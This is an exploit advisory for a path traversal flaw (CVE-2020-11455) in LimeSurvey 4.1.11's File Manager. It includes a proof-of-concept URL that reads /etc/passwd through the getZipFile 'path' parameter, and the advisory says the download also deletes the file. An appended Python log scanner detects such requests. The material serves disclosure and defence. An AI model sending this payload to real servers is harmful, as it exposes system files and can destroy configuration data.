LimeSurvey 4.1.11 – ‘File Manager’ Path Traversal

  • Author: Matthew Aberegg
    Date: 2020-04-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48297/
  • # Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
    # Date: 2020-04-02
    # Exploit Author: Matthew Aberegg, Michael Burkey
    # Vendor Homepage: https://www.limesurvey.org
    # Version: LimeSurvey 4.1.11+200316
    # Tested on: Ubuntu 18.04.4
    # CVE : CVE-2020-11455
    
    # Vulnerability Details
    # Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
    # that allows an attacker to download arbitrary files. The file manager functionality will also
    # delete the file after it is downloaded (if the web service account has permissions to do so), 
    # allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
    Vulnerable Parameter : "path"
    
    
    # POC
    https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
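
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory or of LimeSurvey's code: it scans web access logs for getZipFile requests whose "path" parameter contains parent-directory segments. The combined log format, the helper names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint taken from the advisory's PoC URL (compared case-insensitively).
ENDPOINT = "/admin/filemanager/sa/getzipfile"
# Request and status fields of a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path_value):
    """True if the decoded 'path' value contains a '..' path segment."""
    segments = fully_decode(path_value).replace("\\", "/").split("/")
    return ".." in segments

def scan(lines):
    """Return (line_no, http_status, decoded_path) for suspicious getZipFile requests."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if ENDPOINT not in url.path.lower():
            continue  # only the file manager download endpoint is of interest
        for value in parse_qs(url.query).get("path", []):
            if is_traversal(value):
                hits.append((no, int(m.group(2)), fully_decode(value)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [02/Apr/2020:10:00:01 +0000] "GET /limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.9 - - [02/Apr/2020:10:00:07 +0000] "GET /limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/tmp/export_1234.zip HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Apr/2020:10:00:09 +0000] "GET /limesurvey/index.php/admin/survey/sa/view?path=../x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for no, status, path in scan(SAMPLE):
        print(f"line {no}: status {status} path={path}")
```

For a hit with a 200 status, check whether the referenced file still exists on the server, since the advisory notes that the file manager deletes the file after it is downloaded.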